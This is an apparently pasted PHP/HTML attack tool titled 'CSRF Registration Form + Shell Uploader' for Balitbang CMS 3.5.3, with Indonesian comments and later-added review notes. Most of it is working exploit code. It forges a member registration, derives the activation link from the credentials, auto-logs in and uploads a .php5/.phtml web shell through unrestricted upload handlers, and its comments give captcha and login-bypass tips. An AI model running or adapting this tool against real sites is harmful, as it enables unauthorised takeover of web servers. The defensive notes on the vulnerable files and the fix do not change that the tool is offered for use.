0tamega

CSRF Balitbang

Aug 13th, 2017
  1. <html>
  2. <!---
  3. // script ini dibuat berdasarkan iseng saja... :)
  4. // by. kitasemua
  5. // --------------------------
  6. // Simpan script ini dengan nama: test.php
  7. // - Jika captcha tidak muncul, buka inspect element, arahin cursor ke captcha, ganti link captcha "/functions/captcha/captcha.php" -> "/functions/spam.php"
  8. // - Jika bypass login gagal, silahkan login manual, kemudian lanjut upload shellnya
  9. // - Format shell: *.phtml, *.php5
  10. // --------------------------
  11. // The bugs are in /functions/simmateri.php and /functions/simmateriguru.php
  12. // How to close these bugs: apply a file-extension restriction like the one used in /functions/simlapguru.php
  13. // --------------------------
  14. // Tunggu Tutorial selanjutnya "Bypass $_SESSION untuk Lokomedia, Balitbang, F0rmulaCMS".
  15. // --------------------------
  16. -->
  17. <head>
  18. <title>Balitbang 3.5.3</title>
  19. </head>
  20. <style type="text/css">
  21. input[type=text],input[type=code],input[type=password]{
  22. border:1px solid #c0c0c0;
  23. height:24px;
  24. padding:5px;
  25. }
  26. </style>
  27. <body>
  28. <?php
  // hex(): encodes $str with a numeric offset $code.
  // Output layout: hex(strlen($str) + $code), the literal separator "g", then for each
  // character of the REVERSED string hex(ord(char) + $code).
  // The body only runs when 0 <= $code < 100; otherwise $t is never assigned before the return.
  // $t is appended to without being initialised first.
  // This listing calls it with code "82" to build the "userid" form field and the
  // valid/index.php?id=...&p=... link.
  // NOTE(review): presumably this mirrors an encoding used by the target CMS — confirm against
  // the CMS source. It is a reversible character shift, not encryption or a signature, so any
  // value built with it can be recomputed by anyone who knows the input string.
  29. function hex($str='',$code='') {
  30. if(($code>=0)and($code<100)) {
  // Length header: string length plus offset, in hex, followed by the "g" separator.
  31. $t .=dechex(strlen($str)+$code)."g";
  32. $str=strrev($str);
  33. for($i=0;$i<=strlen($str)-1;$i++) {
  // One shifted character code per input byte, in hex, with no padding.
  34. $t .=dechex(ord(substr($str,$i,1))+$code);
  35. }
  36. }
  37. return $t;
  38. }
  // unhex(): inverse of hex() for the same $code.
  // Splits $str on "g", subtracts $code from the hex length header, and decodes the part after
  // the separator only if that length equals half the number of hex digits that follow.
  // It reads exactly two hex digits per character (substr($content,$i*2,2)), so it relies on
  // every shifted character code having been written as two digits.
  // When the length check fails, $t is never assigned before the return.
  // Not called anywhere in this listing.
  39. function unhex($str='',$code='') {
  40. $all=explode("g",$str);
  41. $head=hexdec($all[0])-$code;
  42. $content=$all[1];
  // Consistency check: declared length must match the number of encoded byte pairs.
  43. if($head==(strlen($content)/2)) {
  44. for($i=0;$i<=$head-1;$i++) {
  45. $t .=chr(hexdec(substr($content,$i*2,2))-$code);
  46. }
  // hex() encoded the reversed string, so reverse again to restore the original order.
  47. $t =strrev($t);
  48. }
  49. return $t;
  50. }
  // Request handling. Every value below comes straight from the query string or POST body;
  // none of them is validated or escaped before being concatenated into URLs or echoed into
  // the HTML further down.
  // $target is used as a base URL and four Balitbang paths are appended to it:
  //   /member/membersave.php          (registration form target)
  //   /functions/simmateri.php        (upload form target)
  //   /functions/captcha/captcha.php  (captcha image)
  //   /member/ajax_login.php          (login form target)
  // NOTE(review): for someone defending a Balitbang 3.5.3 install, these are the request paths
  // this script generates, so they are the ones to look for together in web-server access logs.
  51. $target = $_GET['target'];
  52. $ur_target = $target."/member/membersave.php";
  53. $ur_upload = $target."/functions/simmateri.php";
  54. $captcha = $target."/functions/captcha/captcha.php";
  55. $ur_login = $target."/member/ajax_login.php";
  56. $userx = $_GET['n'];
  57. $passx = $_GET['p'];
  // When the first form is submitted, its three fields are copied into a redirect back to
  // this script with load=daftar.
  58. if(isset($_POST['next'])){
  59. $tar = $_POST['tar'];
  60. $n = $_POST['n'];
  61. $p = $_POST['p'];
  62. header("Location: test.php?load=daftar&n=".$n."&p=".$p."&target=".$tar."");
  63. }
  64. echo "CSRF Regstration Form + Shell Uploader (Balitbang 3.5.3)<hr>";
  65. ?>
  <!-- Operator input form: posts the fields "tar", "n" and "p" back to this same script
       (empty action). The isset($_POST['next']) check earlier in the file consumes them. -->
  66. <form method="post" action="" enctype="multipart/form-data">
  67. <table id=tablebaru cellspacing='1' cellpadding='3'>
  68. <tr>
  69. <td>target</td>
  70. <td>:</td>
  71. <td><input type="text" name="tar" size="61" placeholder='http://'/></td>
  72. </tr>
  73. <tr>
  74. <td>username</td>
  75. <td>:</td>
  76. <td><input type="text" name="n" size="61"/></td>
  77. </tr>
  78. <tr>
  79. <td>password</td>
  80. <td>:</td>
  81. <td><input type="text" name="p" size="61"/></td>
  82. </tr>
  83. <tr>
  84. <td></td>
  85. <td></td>
  86. <td><input type="submit" name="next" value="NEXT &raquo;"/></td>
  87. </tr>
  88. </table>
  89. </form>
  90. <hr>
  91. <?php if(isset($_GET['load']) && $_GET['load'] == "daftar"){
  // Branch load=daftar ("register"): renders a form that posts directly to the target's
  // /member/membersave.php with every profile field pre-filled as a hidden input. Only the
  // captcha code is typed in, and the captcha image is loaded from the target itself.
  // $asli and $pass are the username and password passed through hex() with code "82"; they
  // are used only to build the valid/index.php?id=...&p=... link further down.
  // NOTE(review): the script treats that link as the account activation/verification step. If
  // the CMS really accepts it, the activation value is computable from the credentials alone
  // and does not prove control of the e-mail address; a random, server-stored, single-use
  // token would. Confirm against the CMS source.
  // NOTE(review): $userx and $passx come from $_GET and are echoed unescaped here and in the
  // hidden inputs below.
  92. $asli = hex($userx,"82");
  93. $pass = hex($passx,"82");
  94. echo "username : <b>$userx</b><br>";
  95. echo "password : <b>$passx</b><hr>";
  96. ?>
  97. <form name='formID' action="<?php echo $ur_target;?>" method='post' target='iframe'>
  98. <input type=hidden name='userid' value='<?php echo hex("simtambah,","82");?>'>
  99. <input type=hidden name='name' value='ganteng'/>
  100. <input type=hidden name='username' value='<?php echo $userx;?>'/>
  101. <input type=hidden name='password' value='<?php echo $passx;?>'/>
  102. <input type=hidden name='email' value='abc@abc.abc'/>
  103. <input type=hidden name='kelamin' value='m'/>
  104. <input type=hidden name='jenis' value='Tamu'>
  105. <input type=hidden name='kelas' value=''/>
  106. <input type=hidden name='hari' value='01'/>
  107. <input type=hidden name='bulan' value='01'/>
  108. <input type=hidden name='tahun' value='1995'/>
  109. <input type=hidden name='nis' value=''/>
  110. <input type=hidden name='pertanyaan' value='1'/>
  111. <input type=hidden name='jawaban' value='1'/>
  112. <input type=hidden name='kerja' value='Guru'/>
  113. <input type=hidden name='alamat' value='jauh'/>
  114. <input type=hidden name='sekolah' value='terserah'/>
  115. <input type=hidden name='telp' value='0'/>
  116. <input type=hidden name='blog' value=''/>
  117. <input type=hidden name='tentang' value='terserah'/>
  118. <input type=hidden name='country' value='INDONESIA'/>
  119. <input type=hidden name='stprofil' value='open'/>
  120. <input type=hidden name='stblog' value='on'/>
  121. <table>
  122. <tr>
  123. <td colspan="2" valign="top"><img src='<?php echo $captcha;?>' width='162' height="85"></td>
  124. <td rowspan="2" valign="top"><i>&raquo; capture target...</i><br><iframe name='iframe' width='310' height='90' style="border:1px solid #c0c0c0;"></iframe></td>
  125. </tr>
  126. <tr>
  127. <td valign="top"><input type='text' name='code' size='12' placeholder="captcha"/></td>
  128. <td valign="top"><input type=submit name='submit' value='GO &raquo;'/></td>
  129. </tr>
  130. </table>
  131. </form>
  132. <?php
  // The two echo statements below emit the derived link: first inside an HTML comment, then
  // as buttons that load it into the "verif" iframe and move on to the load=upload branch.
  133. echo "<!--
  134. ini kode registrasinya: valid/index.php?id=".$asli."&p=".$pass."
  135. -->
  136. ";
  137. echo "Langkah selanjutnya:<br>1. Setelah registrasi berhasil, <input type='button' value='klik disini' onclick=\"verif.location.href='".$target."/valid/index.php?id=".$asli."&p=".$pass."'\"/> untuk aktivasi/verifikasi!.
  138. <br><i>&raquo; capture target...</i><br><iframe name='verif' width='480' height='90' style='border:1px solid #c0c0c0;'></iframe><br>2. Langkah terakhir, Upload backdoornya <input type='button' onclick=\"window.location.href='test.php?load=upload&n=".$userx."&p=".$passx."&target=".$target."'\" value='lewat sini brade!!'/><hr>";
  139. } else if(isset($_GET['load']) && $_GET['load'] == "upload"){
  // Branch load=upload: on page load the script auto-submits login_form (user_name/password)
  // to /member/ajax_login.php inside the "autologin" iframe, then offers a multipart form that
  // posts the field "file" to /functions/simmateri.php together with pesan, st, nis and idtugas.
  // The header comment of this script locates the flaw in simmateri.php and simmateriguru.php
  // and names the fix: the file-extension restriction already used in simlapguru.php.
  // NOTE(review), defensive follow-up: the result links below point at /tugas/tgs-ganteng.php5
  // and /tugas/tgs-ganteng.phtml, and "ganteng" is the value of the st field, so stored files
  // presumably follow tgs-<st>.<ext> — confirm. On an affected install, review /tugas/ for
  // .php5/.phtml (or other script-extension) files and the access log for POSTs to the two
  // upload handlers. Besides an extension allow-list in both handlers, serving /tugas/ with
  // script execution disabled limits the impact of any file that still gets through.
  140. ?>
  141. <script type="text/javascript">
  142. window.onload = function(){
  143. document.forms['login_form'].submit()
  144.  
  145. }
  146. function setURL(url){
  147. document.getElementById('verif').src = url;
  148. }
  149. </script>
  150. <form method="post" action="<?php echo $ur_login;?>" target='autologin' name='login_form'>
  151. <input type='hidden' name='user_name' value="<?php echo $userx;?>"/>
  152. <input type='hidden' name='password' value="<?php echo $passx;?>"/>
  153. Jika tidak bisa login dihalaman member, <input type='submit' name='submit' value='Klik disini untuk bikin SESSION'/>
  154. </form>
  155. <div style='margin-top:-20px;'>
  156. <iframe name='autologin' width='30' height='30' style="border:0;"></iframe>
  157. </div>
  158. <form action='<?php echo $ur_upload;?>' method='post' enctype="multipart/form-data" target='golink'>
  159. <input type='hidden' name='pesan' value='abcabcabc'/></td>
  160. <table cellspacing='1' cellpadding='3'>
  161. <tr>
  162. <td valign='top'>File</td>
  163. <td valign='top'>:</td>
  164. <td valign='top'><input type='file' name='file'></td>
  165. <td valign='top' align='right'><input type='submit' value=' Simpan '/></td>
  166. </tr>
  167. <tr>
  168. <td valign='top' colspan="4"><i>&raquo; capture target...</i><br><iframe name='golink' width='475' height='150' style="border:1px solid #c0c0c0;"></iframe></td>
  169. </tr>
  170. <tr>
  171. <td valign='top' colspan="4">
  172. hasil upload (.php5): <a href="<?php echo $target."/tugas/tgs-ganteng.php5";?>" target="_blank"><?php echo $target."/tugas/tgs-ganteng.php5";?></a><br>
  173. hasil upload (.phtml): <a href="<?php echo $target."/tugas/tgs-ganteng.phtml";?>" target="_blank"><?php echo $target."/tugas/tgs-ganteng.phtml";?></a></td>
  174. </tr>
  175. </table>
  176. <input type=hidden name='st' value='ganteng'>
  177. <input type=hidden name='nis' value=''>
  178. <input type=hidden name='idtugas' value=''>
  179. </form>
  180. <hr>
  181. <?php } ?>
  182. </body>
  183. </html>